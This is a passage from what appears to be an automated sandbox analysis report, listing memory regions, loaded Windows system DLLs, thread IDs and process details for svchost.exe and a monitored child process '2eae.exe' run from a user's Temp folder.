"private_0x0000000001590000" filename = "" Region: id = 2229 start_va = 0x1700000 end_va = 0x17fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001700000" filename = "" Region: id = 2230 start_va = 0x1800000 end_va = 0x18fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001800000" filename = "" Region: id = 2231 start_va = 0x1900000 end_va = 0x19fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001900000" filename = "" Region: id = 2232 start_va = 0x1a00000 end_va = 0x1afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a00000" filename = "" Region: id = 2233 start_va = 0x1b00000 end_va = 0x1bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b00000" filename = "" Region: id = 2234 start_va = 0x1c00000 end_va = 0x1cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c00000" filename = "" Region: id = 2235 start_va = 0x1d00000 end_va = 0x2036fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2236 start_va = 0x2040000 end_va = 0x213ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002040000" filename = "" Region: id = 2237 start_va = 0x2140000 end_va = 0x221ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Region: id = 2238 start_va = 0x2220000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 2239 start_va = 0x2320000 end_va = 0x241ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002320000" filename = "" Region: id = 2240 start_va = 0x2420000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 2241 start_va = 0x2700000 end_va = 0x27fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002700000" filename = "" Region: id = 2242 start_va = 0x2800000 end_va = 0x28fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002800000" filename = "" Region: id = 2243 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2244 start_va = 0x2a00000 end_va = 0x2afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 2245 start_va = 0x2b00000 end_va = 0x2bfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b00000" filename = "" Region: id = 2246 start_va = 0x2c00000 end_va = 0x2cfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c00000" filename = "" Region: id = 2247 start_va = 0x2d00000 end_va = 0x2dfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d00000" filename = "" Region: id = 2248 start_va = 0x2f00000 end_va = 0x2ffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f00000" filename = "" Region: id = 2249 start_va = 0x3000000 end_va = 0x30fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003000000" filename = "" Region: id = 2250 start_va = 0x3100000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003100000" filename = "" Region: id = 2251 start_va = 0x3200000 end_va = 0x32fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 2252 start_va = 0x3300000 end_va = 0x33fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2253 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2254 start_va = 0x3500000 end_va = 0x35fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2255 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2256 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 2257 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 2258 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 2259 start_va = 0x7ff681250000 end_va = 0x7ff68125cfff monitored = 0 entry_point = 0x7ff681253980 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2260 start_va = 0x7ff9fc700000 end_va = 0x7ff9fc732fff monitored = 0 entry_point = 0x7ff9fc70ae20 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" (normalized: "c:\\windows\\system32\\wscsvc.dll") Region: id = 2261 start_va = 0x7ffa00990000 end_va = 0x7ffa00a17fff monitored = 0 entry_point = 0x7ffa009a4510 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 2262 start_va = 0x7ffa07cc0000 end_va = 0x7ffa07cd3fff monitored = 0 entry_point = 0x7ffa07cc1800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2263 start_va = 0x7ffa07ce0000 end_va = 0x7ffa07dd5fff monitored = 0 entry_point = 0x7ffa07d19590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2264 start_va = 0x7ffa08390000 end_va = 0x7ffa083a0fff monitored = 0 entry_point = 0x7ffa08392fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2265 start_va = 0x7ffa09490000 end_va = 0x7ffa0950efff monitored = 0 entry_point = 0x7ffa094a7110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2266 start_va = 0x7ffa0b7a0000 end_va = 0x7ffa0b7aafff monitored = 0 entry_point = 0x7ffa0b7a1d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2267 start_va = 0x7ffa0b7b0000 end_va = 0x7ffa0b7f7fff monitored = 0 entry_point = 0x7ffa0b7ba1e0 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" (normalized: "c:\\windows\\system32\\dhcpcore6.dll") Region: id = 2268 start_va = 0x7ffa0b8c0000 end_va = 0x7ffa0b91cfff monitored = 0 entry_point = 0x7ffa0b8d2bf0 region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" (normalized: "c:\\windows\\system32\\dhcpcore.dll") Region: id = 2269 start_va = 0x7ffa0b9f0000 end_va = 0x7ffa0ba09fff monitored = 0 entry_point = 0x7ffa0b9f2430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2270 start_va = 0x7ffa0ba10000 end_va = 0x7ffa0ba25fff monitored = 0 entry_point = 0x7ffa0ba119f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2271 start_va = 0x7ffa0ba70000 end_va = 0x7ffa0ba7dfff monitored = 0 entry_point = 0x7ffa0ba72e50 region_type = mapped_file name = "cmintegrator.dll" filename = "\\Windows\\System32\\cmintegrator.dll" (normalized: "c:\\windows\\system32\\cmintegrator.dll") Region: id = 2272 start_va = 0x7ffa0ba80000 end_va = 0x7ffa0bab7fff monitored = 0 entry_point = 0x7ffa0ba868f0 region_type = mapped_file name = "wcmcsp.dll" filename = "\\Windows\\System32\\wcmcsp.dll" (normalized: "c:\\windows\\system32\\wcmcsp.dll") Region: id = 2273 start_va = 0x7ffa0baf0000 end_va = 0x7ffa0bb27fff monitored = 0 entry_point = 0x7ffa0bb08cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2274 start_va = 0x7ffa0bb30000 end_va = 0x7ffa0bbc8fff monitored = 0 entry_point = 0x7ffa0bb4a090 region_type = mapped_file name = "wcmsvc.dll" filename = "\\Windows\\System32\\wcmsvc.dll" (normalized: "c:\\windows\\system32\\wcmsvc.dll") Region: id = 2275 start_va = 0x7ffa0c7c0000 end_va = 0x7ffa0c8cafff monitored = 0 entry_point = 0x7ffa0c802610 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" (normalized: "c:\\windows\\system32\\audiosrv.dll") Region: id = 2276 start_va = 0x7ffa0c9c0000 end_va = 0x7ffa0ca2ffff monitored = 0 entry_point = 0x7ffa0c9e2960 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 2277 start_va = 0x7ffa0e910000 end_va = 0x7ffa0eac0fff monitored = 0 entry_point = 0x7ffa0e963690 region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" (normalized: "c:\\windows\\system32\\wevtsvc.dll") Region: id = 2278 start_va = 0x7ffa0eb30000 end_va = 0x7ffa0ec65fff monitored = 0 entry_point = 0x7ffa0eb5f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 2279 start_va = 0x7ffa0ed60000 end_va = 0x7ffa0ee27fff monitored = 0 entry_point = 0x7ffa0eda13f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 2280 start_va = 0x7ffa0f0a0000 end_va = 0x7ffa0f0e9fff monitored = 0 entry_point = 0x7ffa0f0aac30 region_type = mapped_file name = "deviceaccess.dll" filename = "\\Windows\\System32\\deviceaccess.dll" (normalized: "c:\\windows\\system32\\deviceaccess.dll") Region: id = 2281 start_va = 0x7ffa0f3e0000 end_va = 0x7ffa0f3f0fff monitored = 0 entry_point = 0x7ffa0f3e3320 region_type = mapped_file name = "wmiclnt.dll" filename = "\\Windows\\System32\\wmiclnt.dll" (normalized: "c:\\windows\\system32\\wmiclnt.dll") Region: id = 2282 start_va = 0x7ffa0ff00000 end_va = 0x7ffa0ff08fff monitored = 0 entry_point = 0x7ffa0ff019a0 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" (normalized: "c:\\windows\\system32\\nrpsrv.dll") Region: id = 2283 start_va = 0x7ffa0ff10000 end_va = 0x7ffa0ff1afff monitored = 0 entry_point = 0x7ffa0ff11cd0 region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" (normalized: "c:\\windows\\system32\\lmhsvc.dll") Region: id = 2284 start_va = 0x7ffa0ff30000 end_va = 0x7ffa0ff47fff monitored = 0 entry_point = 0x7ffa0ff35910 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 2285 start_va = 0x7ffa11220000 end_va = 0x7ffa113a5fff monitored = 0 entry_point = 0x7ffa1126d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 2286 start_va = 0x7ffa11410000 end_va = 0x7ffa11422fff monitored = 0 entry_point = 0x7ffa11412760 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 2287 start_va = 0x7ffa117d0000 end_va = 0x7ffa117f6fff monitored = 0 entry_point = 0x7ffa117d7940 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 2288 start_va = 0x7ffa11800000 end_va = 0x7ffa118a9fff monitored = 0 entry_point = 0x7ffa11827910 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 2289 start_va = 0x7ffa11b10000 end_va = 0x7ffa11b41fff monitored = 0 entry_point = 0x7ffa11b22340 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 2290 start_va = 0x7ffa11d90000 end_va = 0x7ffa11db3fff monitored = 0 entry_point = 0x7ffa11d93260 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 2291 start_va = 0x7ffa11f30000 end_va = 0x7ffa12023fff monitored = 0 entry_point = 0x7ffa11f3a960 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 2292 start_va = 0x7ffa121a0000 end_va = 0x7ffa121abfff monitored = 0 entry_point = 0x7ffa121a27e0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 2293 start_va = 0x7ffa12280000 end_va = 0x7ffa122b0fff monitored = 0 entry_point = 0x7ffa12287d10 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 2294 start_va = 0x7ffa124f0000 end_va = 0x7ffa1250efff monitored = 0 entry_point = 0x7ffa124f5d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 2295 start_va = 0x7ffa12660000 end_va = 0x7ffa126bbfff monitored = 0 entry_point = 0x7ffa12676f70 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 2296 start_va = 0x7ffa12830000 end_va = 0x7ffa1283afff monitored = 0 entry_point = 0x7ffa128319a0 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2297 start_va = 0x7ffa12a10000 end_va = 0x7ffa12a3cfff monitored = 0 entry_point = 0x7ffa12a29d40 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 2298 start_va = 0x7ffa12ba0000 end_va = 0x7ffa12bf5fff monitored = 0 entry_point = 0x7ffa12bb0bf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 2299 start_va = 0x7ffa12c20000 end_va = 0x7ffa12c48fff monitored = 0 entry_point = 0x7ffa12c34530 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2300 start_va = 0x7ffa12d90000 end_va = 0x7ffa12da3fff monitored = 0 entry_point = 0x7ffa12d952e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 2301 start_va = 0x7ffa12db0000 end_va = 0x7ffa12dbffff monitored = 0 entry_point = 0x7ffa12db56e0 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2302 start_va = 0x7ffa12dc0000 end_va = 0x7ffa12e0afff monitored = 0 entry_point = 0x7ffa12dc35f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 2303 start_va = 0x7ffa12e10000 end_va = 0x7ffa12e1efff monitored = 0 entry_point = 0x7ffa12e13210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2304 start_va = 0x7ffa12f40000 end_va = 0x7ffa13106fff monitored = 0 entry_point = 0x7ffa12f9db80 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2305 start_va = 0x7ffa13130000 end_va = 0x7ffa13317fff monitored = 0 entry_point = 0x7ffa1315ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2306 start_va = 0x7ffa13320000 end_va = 0x7ffa13389fff monitored = 0 entry_point = 0x7ffa13356d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2307 start_va = 0x7ffa13390000 end_va = 0x7ffa133d2fff monitored = 0 entry_point = 0x7ffa133a4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 2308 start_va = 0x7ffa133e0000 end_va = 0x7ffa13465fff monitored = 0 entry_point = 0x7ffa133ed8f0 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 2309 start_va = 0x7ffa13b70000 end_va = 0x7ffa13cb2fff monitored = 0 entry_point = 0x7ffa13b98210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2310 start_va = 0x7ffa13cc0000 end_va = 0x7ffa13d5cfff monitored = 0 entry_point = 0x7ffa13cc78a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2311 start_va = 0x7ffa13d60000 end_va = 0x7ffa13d67fff monitored = 0 entry_point = 0x7ffa13d61ea0 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2312 start_va = 0x7ffa13d80000 end_va = 0x7ffa13ed5fff monitored = 0 entry_point = 0x7ffa13d8a8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2313 start_va = 0x7ffa13ee0000 end_va = 0x7ffa14065fff monitored = 0 entry_point = 0x7ffa13f2ffc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2314 start_va = 0x7ffa14070000 end_va = 0x7ffa140cafff monitored = 0 entry_point = 0x7ffa140838b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2315 start_va = 0x7ffa14220000 end_va = 0x7ffa142c6fff monitored = 0 entry_point = 0x7ffa1422b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 2316 start_va = 0x7ffa14340000 end_va = 0x7ffa145bcfff monitored = 0 entry_point = 0x7ffa14414970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2317 start_va = 0x7ffa145c0000 end_va = 0x7ffa146dbfff monitored = 0 entry_point = 0x7ffa146002b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2318 start_va = 0x7ffa146e0000 end_va = 0x7ffa1474afff monitored = 0 entry_point = 0x7ffa146f90c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2319 start_va = 0x7ffa147c0000 end_va = 0x7ffa14880fff monitored = 0 entry_point = 0x7ffa147e0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2320 start_va = 0x7ffa15090000 end_va = 0x7ffa15136fff monitored = 0 entry_point = 0x7ffa150a58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2321 start_va = 0x7ffa15160000 end_va = 0x7ffa1520cfff monitored = 0 entry_point = 0x7ffa151781a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2322 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2885 start_va = 0x2520000 end_va = 0x25f9fff monitored = 0 entry_point = 0x2553c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Thread: id = 127 os_tid = 0x1190 Thread: id = 128 os_tid = 0x118c Thread: id = 129 os_tid = 0x1184 Thread: id = 130 os_tid = 0x1170 Thread: id = 131 os_tid = 0xe3c Thread: id = 132 os_tid = 0xe38 Thread: id = 133 os_tid = 0x224 Thread: id = 134 os_tid = 0x338 Thread: id = 135 os_tid = 0x328 Thread: id = 136 os_tid = 0xbd8 Thread: id = 137 os_tid = 0xaf8 Thread: id = 138 os_tid = 0x478 Thread: id = 139 os_tid = 0x468 Thread: id = 140 os_tid = 0x458 Thread: id = 141 os_tid = 0x450 Thread: id = 142 os_tid = 0x44c Thread: id = 143 os_tid = 0x434 Thread: id = 144 os_tid = 0x42c Thread: id = 145 os_tid = 0x8 Thread: id = 146 os_tid = 0x348 Thread: id = 147 os_tid = 0x324 Thread: id = 148 os_tid = 0x174 Thread: id = 149 os_tid = 0x284 Thread: id = 150 os_tid = 0x394 Process: id = "8" image_name = "2eae.exe" filename = "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe" page_root = "0x7a14a000" os_pid = "0x14c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x144" cmd_line = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" cur_dir = "C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fa87" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2371 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2372 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2373 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2374 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2375 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2376 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2377 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2378 start_va = 0x400000 end_va = 0x472fff monitored = 1 entry_point = 0x40b380 region_type = mapped_file name = "2eae.exe" filename = "\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\2EAE.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\temp\\2eae.exe") Region: id = 2379 start_va = 0x771d0000 end_va = 0x7734afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2380 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2381 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2382 start_va = 0x7fff0000 end_va = 0x7ffa1676ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2383 start_va = 0x7ffa16770000 end_va = 0x7ffa16930fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2384 start_va = 0x7ffa16931000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffa16931000" filename = "" Region: id = 2385 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2387 start_va = 0x400000 end_va = 0x43cfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 2392 start_va = 0x440000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2393 start_va = 0x640d0000 end_va = 0x6411ffff monitored = 0 entry_point = 0x640e8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2394 start_va = 0x64050000 end_va = 0x640c9fff monitored = 0 entry_point = 0x64063290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2395 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2396 start_va = 0x64120000 end_va = 0x64127fff monitored = 0 entry_point = 0x641217c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2397 start_va = 0x440000 end_va = 0x5bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 2398 start_va = 0x5f0000 end_va = 0x5fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 2399 start_va = 0x76720000 end_va = 0x767fffff monitored = 0 entry_point = 0x76733980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2400 start_va = 0x76910000 end_va = 0x76a8dfff monitored = 0 entry_point = 0x769c1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2401 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2402 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2403 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" 